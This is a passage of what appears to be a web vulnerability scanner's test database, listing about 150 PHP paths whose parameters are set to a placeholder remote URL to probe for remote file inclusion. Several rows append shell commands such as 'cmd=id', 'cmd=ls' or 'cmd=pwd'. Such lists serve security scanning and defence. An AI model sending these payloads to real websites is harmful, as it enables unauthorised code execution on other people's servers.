Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004210","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004211","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004212","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004213","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004214","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_webring/admin.webring.docs.php?component_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004215","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004216","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004217","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004218","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/menu_add.php?site_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004219","https://gist.github.com/mubix/5d269c686584875015a2","c","/administrator/menu_operation.php?site_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004220","https://gist.github.com/mubix/5d269c686584875015a2","c","/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004221","https://gist.github.com/mubix/5d269c686584875015a2","c","/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004222","https://gist.github.com/mubix/5d269c686584875015a2","c","/adodb/adodb-errorpear.inc.php?ourlinux_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004223","https://gist.github.com/mubix/5d269c686584875015a2","c","/adodb/adodb-pear.inc.php?ourlinux_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004224","https://gist.github.com/mubix/5d269c686584875015a2","c","/adodb/adodb.inc.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004225","https://gist.github.com/mubix/5d269c686584875015a2","c","/advanced_comment_system/admin.php?ACS_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004226","https://gist.github.com/mubix/5d269c686584875015a2","c","/advanced_comment_system/index.php?ACS_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004227","https://gist.github.com/mubix/5d269c686584875015a2","c","/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004228","https://gist.github.com/mubix/5d269c686584875015a2","c","/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004229","https://gist.github.com/mubix/5d269c686584875015a2","c","/agenda.php3?rootagenda=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004230","https://gist.github.com/mubix/5d269c686584875015a2","c","/agenda2.php3?rootagenda=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004231","https://gist.github.com/mubix/5d269c686584875015a2","c","/aides/index.php?page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004232","https://gist.github.com/mubix/5d269c686584875015a2","c","/ains_main.php?ains_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004233","https://gist.github.com/mubix/5d269c686584875015a2","c","/ajax/loadsplash.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004234","https://gist.github.com/mubix/5d269c686584875015a2","c","/ajouter.php?include=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004235","https://gist.github.com/mubix/5d269c686584875015a2","c","/akarru.gui/main_content.php?bm_content=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004236","https://gist.github.com/mubix/5d269c686584875015a2","c","/akocomments.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004237","https://gist.github.com/mubix/5d269c686584875015a2","c","/amazon/cart.php?cmd=add&asin=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004238","https://gist.github.com/mubix/5d269c686584875015a2","c","/amazon/index.php?lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004239","https://gist.github.com/mubix/5d269c686584875015a2","c","/amazon/info.php?asin=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004240","https://gist.github.com/mubix/5d269c686584875015a2","c","/annonce.php?page=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004241","https://gist.github.com/mubix/5d269c686584875015a2","c","/announcements.php?phpraid_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004242","https://gist.github.com/mubix/5d269c686584875015a2","c","/anzagien.php?config[root_ordner]=@RFIURL?cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004243","https://gist.github.com/mubix/5d269c686584875015a2","c","/apbn/templates/head.php?APB_SETTINGS[template_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004244","https://gist.github.com/mubix/5d269c686584875015a2","c","/api.php?t_path_core=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004245","https://gist.github.com/mubix/5d269c686584875015a2","c","/apps/apps.php?app=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004246","https://gist.github.com/mubix/5d269c686584875015a2","c","/appserv/main.php?appserv_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004247","https://gist.github.com/mubix/5d269c686584875015a2","c","/arab3upload/customize.php?path=@RFIURL?&cmd=pwd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004248","https://gist.github.com/mubix/5d269c686584875015a2","c","/arab3upload/initialize.php?path=@RFIURL?&cmd=pwd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004249","https://gist.github.com/mubix/5d269c686584875015a2","c","/arash_lib/class/arash_gadmin.class.php?arashlib_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004250","https://gist.github.com/mubix/5d269c686584875015a2","c","/arash_lib/class/arash_sadmin.class.php?arashlib_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004251","https://gist.github.com/mubix/5d269c686584875015a2","c","/arash_lib/include/edit.inc.php?arashlib_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004252","https://gist.github.com/mubix/5d269c686584875015a2","c","/arash_lib/include/list_features.inc.php?arashlib_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004253","https://gist.github.com/mubix/5d269c686584875015a2","c","/archive.php?scriptpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004254","https://gist.github.com/mubix/5d269c686584875015a2","c","/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004255","https://gist.github.com/mubix/5d269c686584875015a2","c","/artlist.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004256","https://gist.github.com/mubix/5d269c686584875015a2","c","/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=@RFIURL?cmd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004257","https://gist.github.com/mubix/5d269c686584875015a2","c","/assets/snippets/reflect/snippet.reflect.php?reflect_base=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004258","https://gist.github.com/mubix/5d269c686584875015a2","c","/athena.php?athena_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004259","https://gist.github.com/mubix/5d269c686584875015a2","c","/auction/auction_common.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004260","https://gist.github.com/mubix/5d269c686584875015a2","c","/auction/includes/converter.inc.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004261","https://gist.github.com/mubix/5d269c686584875015a2","c","/auction/includes/messages.inc.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004262","https://gist.github.com/mubix/5d269c686584875015a2","c","/auction/includes/settings.inc.php?include_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004263","https://gist.github.com/mubix/5d269c686584875015a2","c","/auction/phpAdsNew/view.inc.php?phpAds_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004264","https://gist.github.com/mubix/5d269c686584875015a2","c","/auth.cookie.inc.php?da_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004265","https://gist.github.com/mubix/5d269c686584875015a2","c","/auth.header.inc.php?da_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004266","https://gist.github.com/mubix/5d269c686584875015a2","c","/auth.sessions.inc.php?da_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004267","https://gist.github.com/mubix/5d269c686584875015a2","c","/auth/auth.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004268","https://gist.github.com/mubix/5d269c686584875015a2","c","/auth/auth_phpbb/phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004269","https://gist.github.com/mubix/5d269c686584875015a2","c","/authenticate.php?default_path_for_themes=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004270","https://gist.github.com/mubix/5d269c686584875015a2","c","/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004271","https://gist.github.com/mubix/5d269c686584875015a2","c","/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004272","https://gist.github.com/mubix/5d269c686584875015a2","c","/auto_check_renewals.php?installed_config_file=@RFIURL?cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004273","https://gist.github.com/mubix/5d269c686584875015a2","c","/autoindex.php?cfg_file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004274","https://gist.github.com/mubix/5d269c686584875015a2","c","/awzmb/adminhelp.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004275","https://gist.github.com/mubix/5d269c686584875015a2","c","/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004276","https://gist.github.com/mubix/5d269c686584875015a2","c","/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004277","https://gist.github.com/mubix/5d269c686584875015a2","c","/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004278","https://gist.github.com/mubix/5d269c686584875015a2","c","/awzmb/modules/help.incl.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004279","https://gist.github.com/mubix/5d269c686584875015a2","c","/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004280","https://gist.github.com/mubix/5d269c686584875015a2","c","/axoverzicht.cgi?maand=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004281","https://gist.github.com/mubix/5d269c686584875015a2","c","/b2-tools/gm-2-b2.php?b2inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004282","https://gist.github.com/mubix/5d269c686584875015a2","c","/b2verifauth.php?index=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004283","https://gist.github.com/mubix/5d269c686584875015a2","c","/backend/addons/links/index.php?PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004284","https://gist.github.com/mubix/5d269c686584875015a2","c","/basebuilder/src/main.inc.php?mj_config[src_path]=@RFIURL???","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004285","https://gist.github.com/mubix/5d269c686584875015a2","c","/bb_admin.php?includeFooter=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004286","https://gist.github.com/mubix/5d269c686584875015a2","c","/beacon/language/1/splash.lang.php?languagePath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004287","https://gist.github.com/mubix/5d269c686584875015a2","c","/beacon/language/1/splash.lang.php?languagePath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004288","https://gist.github.com/mubix/5d269c686584875015a2","c","/belegungsplan/jahresuebersicht.inc.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004289","https://gist.github.com/mubix/5d269c686584875015a2","c","/belegungsplan/monatsuebersicht.inc.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004290","https://gist.github.com/mubix/5d269c686584875015a2","c","/belegungsplan/tagesuebersicht.inc.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004291","https://gist.github.com/mubix/5d269c686584875015a2","c","/belegungsplan/wochenuebersicht.inc.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004292","https://gist.github.com/mubix/5d269c686584875015a2","c","/bemarket/postscript/postscript.php?p_mode=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004293","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/bib_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004294","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/bib_pldetails.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004295","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/bib_plform.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004296","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/bib_plsearchc.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004297","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/bib_plsearchs.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004298","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/bib_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004299","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/bib_searchc.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004300","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/bib_searchs.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004301","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/edi_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004302","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/edi_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004303","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/gen_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004304","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/gen_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004305","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/lin_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004306","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/lin_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004307","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/luo_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004308","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/luo_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004309","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/sog_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004310","https://gist.github.com/mubix/5d269c686584875015a2","c","/biblioteca/sog_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004311","https://gist.github.com/mubix/5d269c686584875015a2","c","/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004312","https://gist.github.com/mubix/5d269c686584875015a2","c","/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004313","https://gist.github.com/mubix/5d269c686584875015a2","c","/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004314","https://gist.github.com/mubix/5d269c686584875015a2","c","/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004315","https://gist.github.com/mubix/5d269c686584875015a2","c","/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004316","https://gist.github.com/mubix/5d269c686584875015a2","c","/bild.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004317","https://gist.github.com/mubix/5d269c686584875015a2","c","/bin/qte_init.php?qte_root=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004318","https://gist.github.com/mubix/5d269c686584875015a2","c","/bingoserver.php3?response_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004319","https://gist.github.com/mubix/5d269c686584875015a2","c","/block.php?Include=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004320","https://gist.github.com/mubix/5d269c686584875015a2","c","/blocks/birthday.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004321","https://gist.github.com/mubix/5d269c686584875015a2","c","/blocks/events.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004322","https://gist.github.com/mubix/5d269c686584875015a2","c","/blocks/help.php?full_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004323","https://gist.github.com/mubix/5d269c686584875015a2","c","/blogcms/admin/media.php?DIR_LIBS=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004324","https://gist.github.com/mubix/5d269c686584875015a2","c","/blogcms/admin/xmlrpc/server.php?DIR_LIBS=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004325","https://gist.github.com/mubix/5d269c686584875015a2","c","/blogcms/index.php?DIR_PLUGINS=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004326","https://gist.github.com/mubix/5d269c686584875015a2","c","/board/post.php?qb_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004327","https://gist.github.com/mubix/5d269c686584875015a2","c","/boitenews4/index.php?url_index=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004328","https://gist.github.com/mubix/5d269c686584875015a2","c","/books/allbooks.php?home=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004329","https://gist.github.com/mubix/5d269c686584875015a2","c","/books/home.php?home=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004330","https://gist.github.com/mubix/5d269c686584875015a2","c","/books/mybooks.php?home=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004331","https://gist.github.com/mubix/5d269c686584875015a2","c","/bp_ncom.php?bnrep=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004332","https://gist.github.com/mubix/5d269c686584875015a2","c","/bp_ncom.php?bnrep=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004333","https://gist.github.com/mubix/5d269c686584875015a2","c","/bp_news.php?bnrep=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004334","https://gist.github.com/mubix/5d269c686584875015a2","c","/bridge/enigma/E2_header.inc.php?boarddir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004335","https://gist.github.com/mubix/5d269c686584875015a2","c","/bridge/yabbse.inc.php?sourcedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004336","https://gist.github.com/mubix/5d269c686584875015a2","c","/bridges/SMF/logout.php?path_to_smf=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004337","https://gist.github.com/mubix/5d269c686584875015a2","c","/bu/bu_cache.php?bu_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004338","https://gist.github.com/mubix/5d269c686584875015a2","c","/bu/bu_claro.php?bu_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004339","https://gist.github.com/mubix/5d269c686584875015a2","c","/bu/bu_parse.php?bu_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004340","https://gist.github.com/mubix/5d269c686584875015a2","c","/bu/process.php?bu_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004341","https://gist.github.com/mubix/5d269c686584875015a2","c","/buddy.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004342","https://gist.github.com/mubix/5d269c686584875015a2","c","/builddb.php?env_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004343","https://gist.github.com/mubix/5d269c686584875015a2","c","/button/settings_sql.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004344","https://gist.github.com/mubix/5d269c686584875015a2","c","/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004345","https://gist.github.com/mubix/5d269c686584875015a2","c","/cal.func.php?dir_edge_lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004346","https://gist.github.com/mubix/5d269c686584875015a2","c","/calcul-page.php?home=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004347","https://gist.github.com/mubix/5d269c686584875015a2","c","/calendar.php?cfg_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004348","https://gist.github.com/mubix/5d269c686584875015a2","c","/calendar.php?lang=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004349","https://gist.github.com/mubix/5d269c686584875015a2","c","/calendar.php?path_to_calendar=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004350","https://gist.github.com/mubix/5d269c686584875015a2","c","/calendar.php?vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004351","https://gist.github.com/mubix/5d269c686584875015a2","c","/calendar.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004352","https://gist.github.com/mubix/5d269c686584875015a2","c","/calendar/demo/index.php?date=&v=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004353","https://gist.github.com/mubix/5d269c686584875015a2","c","/calendar/payment.php?insPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004354","https://gist.github.com/mubix/5d269c686584875015a2","c","/calendario/cal_insert.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004355","https://gist.github.com/mubix/5d269c686584875015a2","c","/calendario/cal_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004356","https://gist.github.com/mubix/5d269c686584875015a2","c","/calendario/cal_saveactivity.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004357","https://gist.github.com/mubix/5d269c686584875015a2","c","/cart.php?lang_list=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "004358","https://gist.github.com/mubix/5d269c686584875015a2","c","/cart_content.php?cart_isp_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 